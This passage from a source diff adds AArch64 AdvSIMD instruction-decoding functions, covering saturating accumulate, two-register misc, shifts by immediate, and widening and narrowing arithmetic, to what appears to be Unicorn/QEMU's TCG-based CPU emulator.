rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + bool is_double = (size == 3); + + if (is_double) { + TCGv_i64 tcg_rn = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); + int pass; + + for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { + read_vec_element(s, tcg_rn, rn, pass, MO_64); + read_vec_element(s, tcg_rd, rd, pass, MO_64); + + if (is_u) { /* USQADD */ + gen_helper_neon_uqadd_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + } else { /* SUQADD */ + gen_helper_neon_sqadd_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + } + write_vec_element(s, tcg_rd, rd, pass, MO_64); + } + if (is_scalar) { + clear_vec_high(s, rd); + } + + tcg_temp_free_i64(tcg_ctx, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_rn); + } else { + TCGv_i32 tcg_rn = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); + int pass, maxpasses; + + if (is_scalar) { + maxpasses = 1; + } else { + maxpasses = is_q ? 4 : 2; + } + + for (pass = 0; pass < maxpasses; pass++) { + if (is_scalar) { + read_vec_element_i32(s, tcg_rn, rn, pass, size); + read_vec_element_i32(s, tcg_rd, rd, pass, size); + } else { + read_vec_element_i32(s, tcg_rn, rn, pass, MO_32); + read_vec_element_i32(s, tcg_rd, rd, pass, MO_32); + } + + if (is_u) { /* USQADD */ + switch (size) { + case 0: + gen_helper_neon_uqadd_s8(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + break; + case 1: + gen_helper_neon_uqadd_s16(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + break; + case 2: + gen_helper_neon_uqadd_s32(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + break; + default: + g_assert_not_reached(); + } + } else { /* SUQADD */ + switch (size) { + case 0: + gen_helper_neon_sqadd_u8(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + break; + case 1: + gen_helper_neon_sqadd_u16(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + break; + case 2: + gen_helper_neon_sqadd_u32(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + break; + default: + g_assert_not_reached(); + } + } + + if (is_scalar) { + TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); + write_vec_element(s, tcg_zero, rd, 0, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_zero); + } + write_vec_element_i32(s, tcg_rd, rd, pass, MO_32); + } + + if (!is_q) { + clear_vec_high(s, rd); + } + + tcg_temp_free_i32(tcg_ctx, tcg_rd); + tcg_temp_free_i32(tcg_ctx, tcg_rn); + } +} + +/* C3.6.12 AdvSIMD scalar two reg misc + * 31 30 29 28 24 23 22 21 17 16 12 11 10 9 5 4 0 + * +-----+---+-----------+------+-----------+--------+-----+------+------+ + * | 0 1 | U | 1 1 1 1 0 | size | 1 0 0 0 0 | opcode | 1 0 | Rn | Rd | + * +-----+---+-----------+------+-----------+--------+-----+------+------+ + */ +static void disas_simd_scalar_two_reg_misc(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int opcode = extract32(insn, 12, 5); + int size = extract32(insn, 22, 2); + bool u = extract32(insn, 29, 1); + bool is_fcvt = false; + int rmode; + TCGv_i32 tcg_rmode; + TCGv_ptr tcg_fpstatus; + + switch (opcode) { + case 0x3: /* USQADD / SUQADD*/ + if (!fp_access_check(s)) { + return; + } + handle_2misc_satacc(s, true, u, false, size, rn, rd); + return; + case 0x7: /* SQABS / SQNEG */ + break; + case 0xa: /* CMLT */ + if (u) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x8: /* CMGT, CMGE */ + case 0x9: /* CMEQ, CMLE */ + case 0xb: /* ABS, NEG */ + if (size != 3) { + unallocated_encoding(s); + return; + } + break; + case 0x12: /* SQXTUN */ + if (!u) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x14: /* SQXTN, UQXTN */ + if (size == 3) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_2misc_narrow(s, true, opcode, u, false, size, rn, rd); + return; + case 0x0c: case 0x0d: case 0x0e: case 0x0f: + case 0x16: case 0x17: case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: + case 0x1f: + /* Floating point: U, size[1] and opcode indicate operation; + * size[0] indicates single or double precision. + */ + opcode |= (extract32(size, 1, 1) << 5) | (u << 6); + size = extract32(size, 0, 1) ? 3 : 2; + switch (opcode) { + case 0x2c: /* FCMGT (zero) */ + case 0x2d: /* FCMEQ (zero) */ + case 0x2e: /* FCMLT (zero) */ + case 0x6c: /* FCMGE (zero) */ + case 0x6d: /* FCMLE (zero) */ + handle_2misc_fcmp_zero(s, opcode, true, u, true, size, rn, rd); + return; + case 0x1d: /* SCVTF */ + case 0x5d: /* UCVTF */ + { + bool is_signed = (opcode == 0x1d); + if (!fp_access_check(s)) { + return; + } + handle_simd_intfp_conv(s, rd, rn, 1, is_signed, 0, size); + return; + } + case 0x3d: /* FRECPE */ + case 0x3f: /* FRECPX */ + case 0x7d: /* FRSQRTE */ + if (!fp_access_check(s)) { + return; + } + handle_2misc_reciprocal(s, opcode, true, u, true, size, rn, rd); + return; + case 0x1a: /* FCVTNS */ + case 0x1b: /* FCVTMS */ + case 0x3a: /* FCVTPS */ + case 0x3b: /* FCVTZS */ + case 0x5a: /* FCVTNU */ + case 0x5b: /* FCVTMU */ + case 0x7a: /* FCVTPU */ + case 0x7b: /* FCVTZU */ + is_fcvt = true; + rmode = extract32(opcode, 5, 1) | (extract32(opcode, 0, 1) << 1); + break; + case 0x1c: /* FCVTAS */ + case 0x5c: /* FCVTAU */ + /* TIEAWAY doesn't fit in the usual rounding mode encoding */ + is_fcvt = true; + rmode = FPROUNDING_TIEAWAY; + break; + case 0x56: /* FCVTXN, FCVTXN2 */ + if (size == 2) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_2misc_narrow(s, true, opcode, u, false, size - 1, rn, rd); + return; + default: + unallocated_encoding(s); + return; + } + break; + default: + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + if (is_fcvt) { + tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_fpstatus = get_fpstatus_ptr(tcg_ctx); + } else { + TCGV_UNUSED_I32(tcg_rmode); + TCGV_UNUSED_PTR(tcg_fpstatus); + } + + if (size == 3) { + TCGv_i64 tcg_rn = read_fp_dreg(s, rn); + TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); + + handle_2misc_64(s, opcode, u, tcg_rd, tcg_rn, tcg_rmode, tcg_fpstatus); + write_fp_dreg(s, rd, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_rn); + } else { + TCGv_i32 tcg_rn = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); + + read_vec_element_i32(s, tcg_rn, rn, 0, size); + + switch (opcode) { + case 0x7: /* SQABS, SQNEG */ + { + NeonGenOneOpEnvFn *genfn; + static NeonGenOneOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qabs_s8, gen_helper_neon_qneg_s8 }, + { gen_helper_neon_qabs_s16, gen_helper_neon_qneg_s16 }, + { gen_helper_neon_qabs_s32, gen_helper_neon_qneg_s32 }, + }; + genfn = fns[size][u]; + genfn(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn); + break; + } + case 0x1a: /* FCVTNS */ + case 0x1b: /* FCVTMS */ + case 0x1c: /* FCVTAS */ + case 0x3a: /* FCVTPS */ + case 0x3b: /* FCVTZS */ + { + TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); + gen_helper_vfp_tosls(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_shift); + break; + } + case 0x5a: /* FCVTNU */ + case 0x5b: /* FCVTMU */ + case 0x5c: /* FCVTAU */ + case 0x7a: /* FCVTPU */ + case 0x7b: /* FCVTZU */ + { + TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); + gen_helper_vfp_touls(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_shift); + break; + } + default: + g_assert_not_reached(); + } + + write_fp_sreg(s, rd, tcg_rd); + tcg_temp_free_i32(tcg_ctx, tcg_rd); + tcg_temp_free_i32(tcg_ctx, tcg_rn); + } + + if (is_fcvt) { + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); + } +} + +/* SSHR[RA]/USHR[RA] - Vector shift right (optional rounding/accumulate) */ +static void handle_vec_simd_shri(DisasContext *s, bool is_q, bool is_u, + int immh, int immb, int opcode, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = 32 - clz32(immh) - 1; + int immhb = immh << 3 | immb; + int shift = 2 * (8 << size) - immhb; + bool accumulate = false; + bool round = false; + bool insert = false; + int dsize = is_q ? 128 : 64; + int esize = 8 << size; + int elements = dsize/esize; + TCGMemOp memop = size | (is_u ? 0 : MO_SIGN); + TCGv_i64 tcg_rn = new_tmp_a64(s); + TCGv_i64 tcg_rd = new_tmp_a64(s); + TCGv_i64 tcg_round; + int i; + + if (extract32(immh, 3, 1) && !is_q) { + unallocated_encoding(s); + return; + } + + if (size > 3 && !is_q) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + switch (opcode) { + case 0x02: /* SSRA / USRA (accumulate) */ + accumulate = true; + break; + case 0x04: /* SRSHR / URSHR (rounding) */ + round = true; + break; + case 0x06: /* SRSRA / URSRA (accum + rounding) */ + accumulate = round = true; + break; + case 0x08: /* SRI */ + insert = true; + break; + } + + if (round) { + uint64_t round_const = 1ULL << (shift - 1); + tcg_round = tcg_const_i64(tcg_ctx, round_const); + } else { + TCGV_UNUSED_I64(tcg_round); + } + + for (i = 0; i < elements; i++) { + read_vec_element(s, tcg_rn, rn, i, memop); + if (accumulate || insert) { + read_vec_element(s, tcg_rd, rd, i, memop); + } + + if (insert) { + handle_shri_with_ins(tcg_ctx, tcg_rd, tcg_rn, size, shift); + } else { + handle_shri_with_rndacc(s, tcg_rd, tcg_rn, tcg_round, + accumulate, is_u, size, shift); + } + + write_vec_element(s, tcg_rd, rd, i, size); + } + + if (!is_q) { + clear_vec_high(s, rd); + } + + if (round) { + tcg_temp_free_i64(tcg_ctx, tcg_round); + } +} + +/* SHL/SLI - Vector shift left */ +static void handle_vec_simd_shli(DisasContext *s, bool is_q, bool insert, + int immh, int immb, int opcode, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = 32 - clz32(immh) - 1; + int immhb = immh << 3 | immb; + int shift = immhb - (8 << size); + int dsize = is_q ? 128 : 64; + int esize = 8 << size; + int elements = dsize/esize; + TCGv_i64 tcg_rn = new_tmp_a64(s); + TCGv_i64 tcg_rd = new_tmp_a64(s); + int i; + + if (extract32(immh, 3, 1) && !is_q) { + unallocated_encoding(s); + return; + } + + if (size > 3 && !is_q) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + for (i = 0; i < elements; i++) { + read_vec_element(s, tcg_rn, rn, i, size); + if (insert) { + read_vec_element(s, tcg_rd, rd, i, size); + } + + handle_shli_with_ins(tcg_ctx, tcg_rd, tcg_rn, insert, shift); + + write_vec_element(s, tcg_rd, rd, i, size); + } + + if (!is_q) { + clear_vec_high(s, rd); + } +} + +/* USHLL/SHLL - Vector shift left with widening */ +static void handle_vec_simd_wshli(DisasContext *s, bool is_q, bool is_u, + int immh, int immb, int opcode, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = 32 - clz32(immh) - 1; + int immhb = immh << 3 | immb; + int shift = immhb - (8 << size); + int dsize = 64; + int esize = 8 << size; + int elements = dsize/esize; + TCGv_i64 tcg_rn = new_tmp_a64(s); + TCGv_i64 tcg_rd = new_tmp_a64(s); + int i; + + if (size >= 3) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + /* For the LL variants the store is larger than the load, + * so if rd == rn we would overwrite parts of our input. + * So load everything right now and use shifts in the main loop. + */ + read_vec_element(s, tcg_rn, rn, is_q ? 1 : 0, MO_64); + + for (i = 0; i < elements; i++) { + tcg_gen_shri_i64(tcg_ctx, tcg_rd, tcg_rn, i * esize); + ext_and_shift_reg(tcg_ctx, tcg_rd, tcg_rd, size | (!is_u << 2), 0); + tcg_gen_shli_i64(tcg_ctx, tcg_rd, tcg_rd, shift); + write_vec_element(s, tcg_rd, rd, i, size + 1); + } +} + +/* SHRN/RSHRN - Shift right with narrowing (and potential rounding) */ +static void handle_vec_simd_shrn(DisasContext *s, bool is_q, + int immh, int immb, int opcode, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int immhb = immh << 3 | immb; + int size = 32 - clz32(immh) - 1; + int dsize = 64; + int esize = 8 << size; + int elements = dsize/esize; + int shift = (2 * esize) - immhb; + bool round = extract32(opcode, 0, 1); + TCGv_i64 tcg_rn, tcg_rd, tcg_final; + TCGv_i64 tcg_round; + int i; + + if (extract32(immh, 3, 1)) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + tcg_rn = tcg_temp_new_i64(tcg_ctx); + tcg_rd = tcg_temp_new_i64(tcg_ctx); + tcg_final = tcg_temp_new_i64(tcg_ctx); + read_vec_element(s, tcg_final, rd, is_q ? 1 : 0, MO_64); + + if (round) { + uint64_t round_const = 1ULL << (shift - 1); + tcg_round = tcg_const_i64(tcg_ctx, round_const); + } else { + TCGV_UNUSED_I64(tcg_round); + } + + for (i = 0; i < elements; i++) { + read_vec_element(s, tcg_rn, rn, i, size+1); + handle_shri_with_rndacc(s, tcg_rd, tcg_rn, tcg_round, + false, true, size+1, shift); + + tcg_gen_deposit_i64(tcg_ctx, tcg_final, tcg_final, tcg_rd, esize * i, esize); + } + + if (!is_q) { + clear_vec_high(s, rd); + write_vec_element(s, tcg_final, rd, 0, MO_64); + } else { + write_vec_element(s, tcg_final, rd, 1, MO_64); + } + + if (round) { + tcg_temp_free_i64(tcg_ctx, tcg_round); + } + tcg_temp_free_i64(tcg_ctx, tcg_rn); + tcg_temp_free_i64(tcg_ctx, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_final); + return; +} + + +/* C3.6.14 AdvSIMD shift by immediate + * 31 30 29 28 23 22 19 18 16 15 11 10 9 5 4 0 + * +---+---+---+-------------+------+------+--------+---+------+------+ + * | 0 | Q | U | 0 1 1 1 1 0 | immh | immb | opcode | 1 | Rn | Rd | + * +---+---+---+-------------+------+------+--------+---+------+------+ + */ +static void disas_simd_shift_imm(DisasContext *s, uint32_t insn) +{ + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int opcode = extract32(insn, 11, 5); + int immb = extract32(insn, 16, 3); + int immh = extract32(insn, 19, 4); + bool is_u = extract32(insn, 29, 1); + bool is_q = extract32(insn, 30, 1); + + switch (opcode) { + case 0x08: /* SRI */ + if (!is_u) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x00: /* SSHR / USHR */ + case 0x02: /* SSRA / USRA (accumulate) */ + case 0x04: /* SRSHR / URSHR (rounding) */ + case 0x06: /* SRSRA / URSRA (accum + rounding) */ + handle_vec_simd_shri(s, is_q, is_u, immh, immb, opcode, rn, rd); + break; + case 0x0a: /* SHL / SLI */ + handle_vec_simd_shli(s, is_q, is_u, immh, immb, opcode, rn, rd); + break; + case 0x10: /* SHRN */ + case 0x11: /* RSHRN / SQRSHRUN */ + if (is_u) { + handle_vec_simd_sqshrn(s, false, is_q, false, true, immh, immb, + opcode, rn, rd); + } else { + handle_vec_simd_shrn(s, is_q, immh, immb, opcode, rn, rd); + } + break; + case 0x12: /* SQSHRN / UQSHRN */ + case 0x13: /* SQRSHRN / UQRSHRN */ + handle_vec_simd_sqshrn(s, false, is_q, is_u, is_u, immh, immb, + opcode, rn, rd); + break; + case 0x14: /* SSHLL / USHLL */ + handle_vec_simd_wshli(s, is_q, is_u, immh, immb, opcode, rn, rd); + break; + case 0x1c: /* SCVTF / UCVTF */ + handle_simd_shift_intfp_conv(s, false, is_q, is_u, immh, immb, + opcode, rn, rd); + break; + case 0xc: /* SQSHLU */ + if (!is_u) { + unallocated_encoding(s); + return; + } + handle_simd_qshl(s, false, is_q, false, true, immh, immb, rn, rd); + break; + case 0xe: /* SQSHL, UQSHL */ + handle_simd_qshl(s, false, is_q, is_u, is_u, immh, immb, rn, rd); + break; + case 0x1f: /* FCVTZS/ FCVTZU */ + handle_simd_shift_fpint_conv(s, false, is_q, is_u, immh, immb, rn, rd); + return; + default: + unallocated_encoding(s); + return; + } +} + +/* Generate code to do a "long" addition or subtraction, ie one done in + * TCGv_i64 on vector lanes twice the width specified by size. + */ +static void gen_neon_addl(TCGContext *tcg_ctx, int size, bool is_sub, TCGv_i64 tcg_res, + TCGv_i64 tcg_op1, TCGv_i64 tcg_op2) +{ + static NeonGenTwo64OpFn * const fns[3][2] = { + { gen_helper_neon_addl_u16, gen_helper_neon_subl_u16 }, + { gen_helper_neon_addl_u32, gen_helper_neon_subl_u32 }, + { tcg_gen_add_i64, tcg_gen_sub_i64 }, + }; + NeonGenTwo64OpFn *genfn; + assert(size < 3); + + genfn = fns[size][is_sub]; + genfn(tcg_ctx, tcg_res, tcg_op1, tcg_op2); +} + +static void handle_3rd_widening(DisasContext *s, int is_q, int is_u, int size, + int opcode, int rd, int rn, int rm) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* 3-reg-different widening insns: 64 x 64 -> 128 */ + TCGv_i64 tcg_res[2]; + int pass, accop; + + tcg_res[0] = tcg_temp_new_i64(tcg_ctx); + tcg_res[1] = tcg_temp_new_i64(tcg_ctx); + + /* Does this op do an adding accumulate, a subtracting accumulate, + * or no accumulate at all? + */ + switch (opcode) { + case 5: + case 8: + case 9: + accop = 1; + break; + case 10: + case 11: + accop = -1; + break; + default: + accop = 0; + break; + } + + if (accop != 0) { + read_vec_element(s, tcg_res[0], rd, 0, MO_64); + read_vec_element(s, tcg_res[1], rd, 1, MO_64); + } + + /* size == 2 means two 32x32->64 operations; this is worth special + * casing because we can generally handle it inline. + */ + if (size == 2) { + for (pass = 0; pass < 2; pass++) { + TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_passres; + TCGMemOp memop = MO_32 | (is_u ? 0 : MO_SIGN); + + int elt = pass + is_q * 2; + + read_vec_element(s, tcg_op1, rn, elt, memop); + read_vec_element(s, tcg_op2, rm, elt, memop); + + if (accop == 0) { + tcg_passres = tcg_res[pass]; + } else { + tcg_passres = tcg_temp_new_i64(tcg_ctx); + } + + switch (opcode) { + case 0: /* SADDL, SADDL2, UADDL, UADDL2 */ + tcg_gen_add_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + break; + case 2: /* SSUBL, SSUBL2, USUBL, USUBL2 */ + tcg_gen_sub_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + break; + case 5: /* SABAL, SABAL2, UABAL, UABAL2 */ + case 7: /* SABDL, SABDL2, UABDL, UABDL2 */ + { + TCGv_i64 tcg_tmp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_tmp2 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_sub_i64(tcg_ctx, tcg_tmp1, tcg_op1, tcg_op2); + tcg_gen_sub_i64(tcg_ctx, tcg_tmp2, tcg_op2, tcg_op1); + tcg_gen_movcond_i64(tcg_ctx, is_u ? TCG_COND_GEU : TCG_COND_GE, + tcg_passres, + tcg_op1, tcg_op2, tcg_tmp1, tcg_tmp2); + tcg_temp_free_i64(tcg_ctx, tcg_tmp1); + tcg_temp_free_i64(tcg_ctx, tcg_tmp2); + break; + } + case 8: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ + case 10: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ + case 12: /* UMULL, UMULL2, SMULL, SMULL2 */ + tcg_gen_mul_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + break; + case 9: /* SQDMLAL, SQDMLAL2 */ + case 11: /* SQDMLSL, SQDMLSL2 */ + case 13: /* SQDMULL, SQDMULL2 */ + tcg_gen_mul_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, + tcg_passres, tcg_passres); + break; + default: + g_assert_not_reached(); + } + + if (opcode == 9 || opcode == 11) { + /* saturating accumulate ops */ + if (accop < 0) { + tcg_gen_neg_i64(tcg_ctx, tcg_passres, tcg_passres); + } + gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, + tcg_res[pass], tcg_passres); + } else if (accop > 0) { + tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); + } else if (accop < 0) { + tcg_gen_sub_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); + } + + if (accop != 0) { + tcg_temp_free_i64(tcg_ctx, tcg_passres); + } + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + } + } else { + /* size 0 or 1, generally helper functions */ + for (pass = 0; pass < 2; pass++) { + TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 tcg_passres; + int elt = pass + is_q * 2; + + read_vec_element_i32(s, tcg_op1, rn, elt, MO_32); + read_vec_element_i32(s, tcg_op2, rm, elt, MO_32); + + if (accop == 0) { + tcg_passres = tcg_res[pass]; + } else { + tcg_passres = tcg_temp_new_i64(tcg_ctx); + } + + switch (opcode) { + case 0: /* SADDL, SADDL2, UADDL, UADDL2 */ + case 2: /* SSUBL, SSUBL2, USUBL, USUBL2 */ + { + TCGv_i64 tcg_op2_64 = tcg_temp_new_i64(tcg_ctx); + static NeonGenWidenFn * const widenfns[2][2] = { + { gen_helper_neon_widen_s8, gen_helper_neon_widen_u8 }, + { gen_helper_neon_widen_s16, gen_helper_neon_widen_u16 }, + }; + NeonGenWidenFn *widenfn = widenfns[size][is_u]; + + widenfn(tcg_ctx, tcg_op2_64, tcg_op2); + widenfn(tcg_ctx, tcg_passres, tcg_op1); + gen_neon_addl(tcg_ctx, size, (opcode == 2), tcg_passres, + tcg_passres, tcg_op2_64); + tcg_temp_free_i64(tcg_ctx, tcg_op2_64); + break; + } + case 5: /* SABAL, SABAL2, UABAL, UABAL2 */ + case 7: /* SABDL, SABDL2, UABDL, UABDL2 */ + if (size == 0) { + if (is_u) { + gen_helper_neon_abdl_u16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + } else { + gen_helper_neon_abdl_s16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + } + } else { + if (is_u) { + gen_helper_neon_abdl_u32(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + } else { + gen_helper_neon_abdl_s32(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + } + } + break; + case 8: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ + case 10: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ + case 12: /* UMULL, UMULL2, SMULL, SMULL2 */ + if (size == 0) { + if (is_u) { + gen_helper_neon_mull_u8(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + } else { + gen_helper_neon_mull_s8(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + } + } else { + if (is_u) { + gen_helper_neon_mull_u16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + } else { + gen_helper_neon_mull_s16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + } + } + break; + case 9: /* SQDMLAL, SQDMLAL2 */ + case 11: /* SQDMLSL, SQDMLSL2 */ + case 13: /* SQDMULL, SQDMULL2 */ + assert(size == 1); + gen_helper_neon_mull_s16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, + tcg_passres, tcg_passres); + break; + case 14: /* PMULL */ + assert(size == 0); + gen_helper_neon_mull_p8(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + break; + default: + g_assert_not_reached(); + } + tcg_temp_free_i32(tcg_ctx, tcg_op1); + tcg_temp_free_i32(tcg_ctx, tcg_op2); + + if (accop != 0) { + if (opcode == 9 || opcode == 11) { + /* saturating accumulate ops */ + if (accop < 0) { + gen_helper_neon_negl_u32(tcg_ctx, tcg_passres, tcg_passres); + } + gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, + tcg_res[pass], + tcg_passres); + } else { + gen_neon_addl(tcg_ctx, size, (accop < 0), tcg_res[pass], + tcg_res[pass], tcg_passres); + } + tcg_temp_free_i64(tcg_ctx, tcg_passres); + } + } + } + + write_vec_element(s, tcg_res[0], rd, 0, MO_64); + write_vec_element(s, tcg_res[1], rd, 1, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_res[0]); + tcg_temp_free_i64(tcg_ctx, tcg_res[1]); +} + +static void handle_3rd_wide(DisasContext *s, int is_q, int is_u, int size, + int opcode, int rd, int rn, int rm) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_res[2]; + int part = is_q ? 2 : 0; + int pass; + + for (pass = 0; pass < 2; pass++) { + TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 tcg_op2_wide = tcg_temp_new_i64(tcg_ctx); + static NeonGenWidenFn * const widenfns[3][2] = { + { gen_helper_neon_widen_s8, gen_helper_neon_widen_u8 }, + { gen_helper_neon_widen_s16, gen_helper_neon_widen_u16 }, + { tcg_gen_ext_i32_i64, tcg_gen_extu_i32_i64 }, + }; + NeonGenWidenFn *widenfn = widenfns[size][is_u]; + + read_vec_element(s, tcg_op1, rn, pass, MO_64); + read_vec_element_i32(s, tcg_op2, rm, part + pass, MO_32); + widenfn(tcg_ctx, tcg_op2_wide, tcg_op2); + tcg_temp_free_i32(tcg_ctx, tcg_op2); + tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); + gen_neon_addl(tcg_ctx, size, (opcode == 3), + tcg_res[pass], tcg_op1, tcg_op2_wide); + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2_wide); + } + + for (pass = 0; pass < 2; pass++) { + write_vec_element(s, tcg_res[pass], rd, pass, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); + } +} + +static void do_narrow_high_u32(TCGContext *tcg_ctx, TCGv_i32 res, TCGv_i64 in) +{ + tcg_gen_shri_i64(tcg_ctx, in, in, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, res, in); +} + +static void do_narrow_round_high_u32(TCGContext *tcg_ctx, TCGv_i32 res, TCGv_i64 in) +{ + tcg_gen_addi_i64(tcg_ctx, in, in, 1U << 31); + do_narrow_high_u32(tcg_ctx, res, in); +} + +static void handle_3rd_narrowing(DisasContext *s, int is_q, int is_u, int size, + int opcode, int rd, int rn, int rm) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tcg_res[2]; + int part = is_q ? 2 : 0; + int pass; + + for (pass = 0; pass < 2; pass++) { + TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_wideres = tcg_temp_new_i64(tcg_ctx); + static NeonGenNarrowFn * const narrowfns[3][2] = { + { gen_helper_neon_narrow_high_u8, + gen_helper_neon_narrow_round_high_u8 }, + { gen_helper_neon_narrow_high_u16, + gen_helper_neon_narrow_round_high_u16 }, + { do_narrow_high_u32, do_narrow_round_high_u32 }, + }; + NeonGenNarrowFn *gennarrow = narrowfns[size][is_u]; + + read_vec_element(s, tcg_op1, rn, pass, MO_64); + read_vec_element(s, tcg_op2, rm, pass, MO_64); + + gen_neon_addl(tcg_ctx, size, (opcode == 6), tcg_wideres, tcg_op1, tcg_op2); + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + + tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); + gennarrow(tcg_ctx, tcg_res[pass], tcg_wideres); + tcg_temp_free_i64(tcg_ctx, tcg_wideres); + } + + for (pass = 0; pass < 2; pass++) { + write_vec_element_i32(s, tcg_res[pass], rd, pass + part, MO_32); + tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); + } + if (!is_q) { + clear_vec_high(s, rd); + } 